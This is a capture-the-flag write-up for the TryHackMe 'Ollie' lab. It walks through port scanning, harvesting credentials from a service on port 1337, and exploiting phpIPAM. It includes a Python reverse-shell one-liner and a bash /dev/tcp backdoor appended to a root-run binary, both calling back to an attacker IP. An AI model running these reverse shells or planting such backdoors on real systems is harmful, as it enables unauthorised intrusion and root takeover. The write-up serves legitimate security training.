Ollie

Lab Setup

mkdir ~/Documents/TryHackMe/ollie
cd ~/Documents/TryHackMe/ollie
mkdir recon enumeration notes
touch notes{README.md,vulns,creds}


export IP=10.10.156.24
export URL=http://$IP

Enumeration

To begin, perform a comprehensive scan of the machine's open ports using both rustscan and nmap. This dual approach ensures a thorough examination of the network, providing a more detailed understanding of the available services and potential vulnerabilities.

  • nmap

nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp

  • rutscan

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init

Looks like I found 3 open ports. I begin to enumerate the 1337 port. Try to establish a connection with nc command and you will get website credentials. 

nc $IP 1337

Use this credentials to login and now let's enumerate the website. To obtain a reverse shell it is quite simple. I see that it is about phpIPAM, so search in exploit-db.

I found an python script and you will add an evil.php file.

Exploitation

Use this to get a reverse shell.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.113.25",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

After a lot of enumeration I discover that all I need to do is change the user to ollie and use the password that I found from 1337 port connection.

Privilege Escalation

After some while I found a file that can be modified by user ollie and it executes as root. So put a backdoor and you will get a shell as root.

ollie@hackerdog:/usr/bin$ echo 'bash -i >& /dev/tcp/10.8.113.25/8888 0>&1' >> /usr/bin/feedme

Open a netcat listener and wait for a while.

┌──(kali㉿kali)-[~/Documents/TryHackMe/ollie]
└─$ rlwrap nc -lnvp 8888                        
listening on [any] 8888 ...
connect to [10.8.113.25] from (UNKNOWN) [10.10.97.198] 37274
bash: cannot set terminal process group (4102): Inappropriate ioctl for device
bash: no job control in this shell
root@hackerdog:/# whoami 
whoami 
root
PreviousColddBox: EasyNextBlog

Last updated